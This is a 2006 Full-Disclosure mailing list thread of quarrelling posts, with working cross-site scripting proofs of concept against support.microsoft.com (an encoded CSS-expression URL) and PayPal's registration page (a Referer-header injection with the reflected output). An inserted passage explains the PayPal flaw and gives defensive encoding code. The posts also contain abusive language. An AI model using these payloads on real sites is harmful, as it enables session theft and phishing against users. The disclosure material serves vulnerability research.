Re: [Full-disclosure] Re: micosoft.com xss



For such words you could eat your hat if I wanted to go public.
It's the last time I am teaching script kiddies something beyond their understanding.
I would like you to have at least a small area in your brain that restricts your tongue.
If you weren't a script kiddie you would take your words back and learn instead.
Yesterday's code is here:

http://support.microsoft.com/newsgroups/default.aspx?lang=en&cr=US&dg=microsoft.public.ccf&sloc=us%27%29%22%20st%79le%3d%22co%6cor%3aex%70ress%69on%28ale%72t%28String.fromCharCode%280x004d%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x0063%29%2bString.fromCharCode%280x0072%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x002c%29%2bString.fromCharCode%280x0073%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0066%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x003a%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x006d%29%2bString.fromCharCode%280x0070%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0065%29%2bString.fromCharCode%280x006e%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0021%29%29%29%22%20a%3d%22%5c%22%29

Learn, learn, learn (of course, if you have enough skills to handle your browser after that).

Greets,
Mad World.

--- thomas.pollet@xxxxxxxxx wrote:

Man, you suck. Code or stfu.

I know the code is broken in more than one place; I tried registering event handlers, exiting JScript, etc. etc. Time to move on....

Point is, XSS is everywhere, trust no one, etc. etc.

To make my point clear... last of the xss@xxxxxxxxx

GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");var%20f="



results in

....
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Landing Page";
s.prop11="general/SignupInitial.xsl::_registration-run::0";
s.channel="Sign Up:Landing Page";
s.r="https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&amp;source_page=_profile-comparison ";alert("xss");var%20f="";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
s.visitorSampling= "20";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>

In other words.... the Referer URL isn't correctly sanitized on the PayPal registration page and is used in a JS variable.
PoC: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");s.r="

and click on the sign up link

Have a nice life, die soon,
Thomas

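The PayPal snippet quoted above drops the raw Referer header between the double quotes of `s.r="..."`, so a `"` in the header closes the string and the rest of the header runs as code. Below is an added example (not from the thread or from PayPal's SiteCatalyst code) showing that naive concatenation beside a JavaScript-string-literal encoder that keeps the value inert; the referer value is constructed to mirror the one in the post.

```javascript
// Constructed referer, modelled on the value quoted in the post above.
const REFERER = 'https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");var f="';

// The page's approach: raw header value dropped between double quotes.
function unsafeSnippet(referer) {
  return 's.r="' + referer + '";';
}

// Emit a JavaScript string literal whose contents can neither terminate the
// literal nor the surrounding inline <script> element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    // JSON.stringify leaves these alone, but they matter inside inline <script>:
    .replace(/</g, '\\u003c')      // blocks "</script>" and "<!--"
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028') // legal in JSON, a line terminator in JS
    .replace(/\u2029/g, '\\u2029');
}

// Hardened approach: the value is encoded, never concatenated raw.
function safeSnippet(referer) {
  return 's.r=' + jsStringLiteral(referer) + ';';
}

// Execute one generated statement in isolation and read s.r back, so the
// effect of the emitted code can be checked rather than eyeballed.
function assignedValue(snippet) {
  return new Function('var s = {}; ' + snippet + ' return s.r;')();
}

// The encoded literal must parse back to exactly the input: nothing was
// truncated and no second statement was smuggled in.
function roundTrips(referer) {
  return JSON.parse(jsStringLiteral(referer)) === referer;
}
```

Running `assignedValue(unsafeSnippet(REFERER))` reaches the injected `alert(...)` call, while `assignedValue(safeSnippet(REFERER))` simply returns the full referer string unchanged.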

On 08/08/06, Mad World <penetrator@xxxxxxxxxx> wrote:
Good morning!

You can doubt; it's your right to do so.
Wanna bet?
Just open your eyes and your nose will show you that you are actually breaking the silly structure of the page in more than one place..
It's relatively easy using the exact same place in the code you tried to make it.
I have a working example; it is based on other Microsoft "features" as well.

Greets,
- Mad World

--- thomas.pollet@xxxxxxxxx wrote:

From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
To: penetrator@xxxxxxxxxx
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Re: micosoft.com xss
Date: Tue, 8 Aug 2006 10:18:56 +0200

On 08/08/06, Mad World <penetrator@xxxxxxxxxx> wrote:

Why do you need it?
You already discovered XSS; the rest of the "job" is just a matter
of technique.
I think the majority of XSS submitters here could do it by
various means.
M$ is lost in its own complexity of how to do simple things.
If you could ever give me a reasonable answer for why you
need this $hit, I could give you the "rest", like others
could.

I doubt you actually tried getting JS executed on page load
(for some reason they try to prevent XSS in a number of ways).
I did try and didn't succeed; that's why I ask.
Greets,
Thomas



_____________________________________________________________
Visit Thailand @ http://www.sawadee.com
Websearch and email: DNSASIA.com .... FAST!
128k dialup: login.samuinet.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


